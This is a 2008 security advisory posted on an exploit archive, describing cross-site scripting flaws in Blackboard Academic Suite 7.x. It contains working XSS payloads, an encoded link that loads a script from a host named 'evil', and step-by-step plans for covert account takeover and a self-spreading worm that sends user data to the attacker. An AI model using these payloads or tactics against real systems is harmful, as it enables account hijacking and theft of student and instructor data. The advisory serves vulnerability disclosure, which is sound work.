exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

blackboard-xss.txt

blackboard-xss.txt
Posted Mar 26, 2008
Authored by Knight4vn

Blackboard versions 7.x and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | a645dcc1193f7bfeb626eb7d7cae92f14e5c4bcf9b67413688401878b50d78d7

blackboard-xss.txt

Change Mirror Download
////////////////////////////////////////////////////////////////////////////////
//Note:
//The full version of this report (in pdf format) available at my blog:
//http://www.secskill.wordpress.com
// OR :
//http://www.scribd.com/doc/2363025/Blackboard-Academic-Suite-Multiple-XSS-Vulnerabilities-
////////////////////////////////////////////////////////////////////////////////////////


Blackboard Academic Suites Multiple Cross Site Scripting Vulnerabilities

Background:
Blackboard Academic Suite Blackboard is an enterprise software solution for providing interactive learning and management capabilities for educational institutions.
Many institutions currently are using Blackboard such as: Princeton, Yale, Duke University of Pennsylvania, and University of Texas at Austin …

Platforms Affected:
All versions (7.x and lower)

Description: Combining XSS and some conditions already exists in Blackboard system.
Attacker can login and do everything (change grades, edit online test’s content…) with instructors’ identity.

Vulnerable paths:
1/
http://site.edu/webapps/blackboard/execute/viewCatalog?type=Course&searchText=”><script>alert(‘xss’)</script>

2/Add announcement page: (instructor access only)
http://site.edu/bin/common/announcement.pl?action=ADD&course_id=_137839_1&render_type=EDITABLE&context=course

<input type="text" name="data__announcements___pk1_pk2__subject" value=”<script>alert(‘worm activated!’)</script>” />

Author: Duong Thanh - Knight4vn
(knightvn (at) gmail.com or knight4vn (at) yahoo.com )

Vulnerabilities discovered: 12/2007

Vendor and Universities Contacted: 02/2008

Public disclosure: 03/2008


PART I - COMPROMISING USER’S ACCOUNT
Explanation:
When user already has session and he/she clicks on that link (from email), the exploit code will be automatically executed. User’s email address is changed without his/her notice. At the same time, his/her current email address, first and last name, and current encrypted password (in User Information page) is logged by a remote server side script.

The attacker reads all these information in a log file.
After that, he gets a new user password sent to his email address by using Lost Password form.
With victim’s username and password, the attacker has full permission on that account and does whatever he wants.
Upon finishing his works, he changes back user’s initial email address and encrypted password.


Analysis:
Although we can change victim’s password by using exploit code but we should not use it. The victim can not login to the system and he/she immediately realize there is something fishy.

Edit Personal Info page:
http://site.edu/webapps/blackboard/execute/editUser?context=self_modify

Blackboard stores encrypted user password in Edit Personal Info page:

<INPUT TYPE="hidden" NAME="password" VALUE="CE0BFD15059B68D67688884D7A3D3E8C">

Hence, we have no problem with grabbing current user’s encrypted password.


On this page:
http://site.edu/bin/common/user.pl?action=MODIFY&context=PASSWORD
Blackboard calls a function in ‘/javascript/md5.js’ to encrypt password on client side before submitting this form to ‘/webapps/blackboard/execute/editUser’. So it’s possible to submit directly encrypted password to the server side script. Therefore, we take advantage of this to bring victim’s encrypted password back to its initial state.
As a result, victim’s account was compromised completely without his/her awareness.

Proof-of-concept:
Steal.js



PART II - MAKING A WEB-BASED WORM

Just imagine what would happen if someone took advantage of these holes to create a javascript-based worm? Think about this scenario for a second:
A black-hat guy wrote a worm and he send it to a person (for ex: an instructor).
The instructor immediately gets infected. The worm uses his identity to spread by sending itself to all student current enrolling his courses. Students get infected; the worm once again uses their identity to send itself to all their classmates and their other instructors… Combination of multiple XSS vulnerabilities make the worm spread very fast.
During its propagation, the worm could log all private users info (emails, names, grades…) then report back to the attacker (for spamming purposes), or it could simply do whatever the attacker wants with user account.

ANALYSIS:
Blackboard does not filter on title of Announcement

<input type="text" name="data__announcements___pk1_pk2__subject" value=”<script>alert(‘worm activated!’)</script>” />

So we can take advantage of this persistent XSS to inject arbitrary script on the web page.
The announcement will be posted on the front page. So once students log in
The malicious script will have to be run at least one time.


Students spread this worm by sending the infected link to their classmates
and his other instructors via Send mail form of Blackboard.
Here is what a student will be forced to send in the email.

Encoded Version:
Hi,
I don’t understand today online assignment. Would you mind helping me out?
http://site.edu/webapps/blackboard/execute/viewCatalog?type=Course&searchText=%94%3E%3C%73%63%72%69%70%74%20%73%72%63%20%3D%20%91%68%74%74%70%3A%2F%2F%65%76%69%6C%2F%77%6F%72%6D%2E%6A%73%92%3E%3C%2F%73%63%72%69%70%74%3E

Proof-Of-Concept: worm.js

Worm Features:
Log all user info and send them to the attacker.
Propanagate by Send mail form and create announcements with hidden malicious script.

CONCLUSION:
It is possible for hackers to silently steal instructor’s password and change his grade. In worst case, he could use XSS worm to take the entire system down (MySpace’s case). The consequence is foreseeable.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close